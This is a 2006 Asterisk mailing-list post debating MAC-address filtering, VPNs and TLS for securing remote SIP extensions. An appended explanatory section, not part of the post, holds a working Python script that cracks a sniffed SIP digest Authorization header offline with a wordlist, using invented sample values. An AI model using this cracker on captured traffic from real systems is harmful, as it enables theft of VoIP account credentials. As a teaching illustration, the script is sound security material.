[Asterisk-Users] hook into authentication

Steve Totaro stotaro at asteriskhelpdesk.com
Mon May 29 05:29:46 MST 2006


trixter aka Bret McDanel wrote:
> On Sun, 2006-05-28 at 23:41 -0400, Steve Totaro wrote:
>   
>> Henry J. Cobb wrote:
>>     
>>>> to increase the security for remote extensions I would like to limit a
>>>> sip-peer to a specific MAC address. Is it possible to "hook into" the
>>>> authentication mechanism in asterisk and allow/deny incoming
>>>> registrations?
>>>>     
>>>>         
>>> This would be only mildly useful on the same subnet and completely useless
>>> over the internet.
>>>
>>> -HJC
>>>
>>>   
>>>       
>> I think it would work just fine over the internet using a bridged VPN.
>>     
>
> even on a local network this can be forged.  If you can't control the
> device that sends this information it is user supplied data, even over a
> vpn (which uses a virtual interface not the physical one).  It has the
> same value as any user supplied data - other than perhaps its additional
> data which makes guessing slightly harder.  
>
> TLS might be a better way to go since it would require a certificate
> that you can control the issuance of, but that certificate can be stolen
> and the remote end point would need to support the same scheme that you
> use (fortunately there are standards that make this easier with some
> devices but most don't implement this).  
>
> A vpn would provide security in that it would make it harder for someone
> to eavesdrop on the auth and attempt to derrive the password, however
> there is overhead associated with that.  At least 1 IP packet per real
> packet (sometimes more) on the network side, and the crypto parts on the
> cpu side.  For the server you would want to have a hardware based crypto
> card to deal with the VPN connections...
>   
I have had great luck with OpenVPN, any reason why you like hardware?  I 
find OpenVPN to be just as reliable and stable as any hardware VPN such 
as Cisco.  VPN will also make it very difficult to sniff or snoop on RTP 
streams if eavesdropping is a concern.  I even have OpenVPN running on a 
Linksys running OpenWRT and have rock solid connectivity unless there is 
a carrier issue out of my control. 

Forging a MAC address is trivial on most devices.  Forge a MAC address 
on a LAN (or bridged VPN) and you will quickly find that the conflict 
will cripple or cut off your connectivity since switches will become 
confused where to send the packets and have funky arp entries.

Thanks,
Steve Totaro
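As an added illustration of the point made in the thread above (that a sniffed SIP authentication exchange can be attacked offline to derive the password, and that nothing in the authenticated material binds the peer to a MAC address), here is a short Python example. It is not code from the thread or from Asterisk: it computes the SIP digest response the way RFC 3261 / RFC 2617 describe it (MD5, no qop), builds a constructed Authorization header for a made-up peer, and then runs a dictionary attack against that header as an eavesdropper on the wire would. The peer name, realm, nonce, URI and password are all invented sample values.

```python
import hashlib
import re

# Constructed sample values for an imaginary SIP peer; not real credentials.
USERNAME = "1001"
REALM = "asterisk"
PASSWORD = "secret123"
NONCE = "3f2a9c1e"              # nonce the server would send in its 401 challenge
URI = "sip:pbx.example.com"
METHOD = "REGISTER"


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """Digest response as used for SIP REGISTER (RFC 2617 style, no qop).

    Inputs are only username, realm, password, method, URI and nonce.
    No source IP, no MAC address and nothing from the link layer takes
    part, so a MAC check adds nothing an attacker must also forge to
    pass authentication: the shared secret is the only binding.
    """
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_authorization(username, realm, password, method, uri, nonce):
    """Build the Authorization header a client would send after the challenge."""
    resp = digest_response(username, realm, password, method, uri, nonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{resp}", algorithm=MD5')


def parse_authorization(header: str) -> dict:
    """Parse the comma-separated key=value pairs of a Digest header."""
    body = header.split(" ", 1)[1]          # drop the leading 'Digest'
    return dict(re.findall(r'(\w+)="?([^",]*)"?', body))


def crack_digest(header: str, method: str, wordlist):
    """Offline dictionary attack on a sniffed Authorization header.

    Everything except the password is visible in the header, so each
    candidate can be checked locally with no further traffic to the PBX.
    Returns the password on success, None if nothing in the list matches.
    """
    p = parse_authorization(header)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate,
                                method, p["uri"], p["nonce"])
        if guess == p["response"]:
            return candidate
    return None


# Constructed "sniffed" header, as it would appear in a captured REGISTER.
SNIFFED_AUTHORIZATION = build_authorization(USERNAME, REALM, PASSWORD, METHOD, URI, NONCE)

# Tiny constructed wordlist; a real attack would use a much larger one.
WORDLIST = ["1234", "password", "1001", "secret123", "letmein"]

if __name__ == "__main__":
    print("captured:", SNIFFED_AUTHORIZATION)
    print("recovered password:", crack_digest(SNIFFED_AUTHORIZATION, METHOD, WORDLIST))
```

The nonce stops a captured response from being replayed for a later registration, but it does nothing against guessing the password from the capture, which is exactly why hiding the exchange inside a VPN (or TLS) matters more than filtering on a forgeable MAC.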


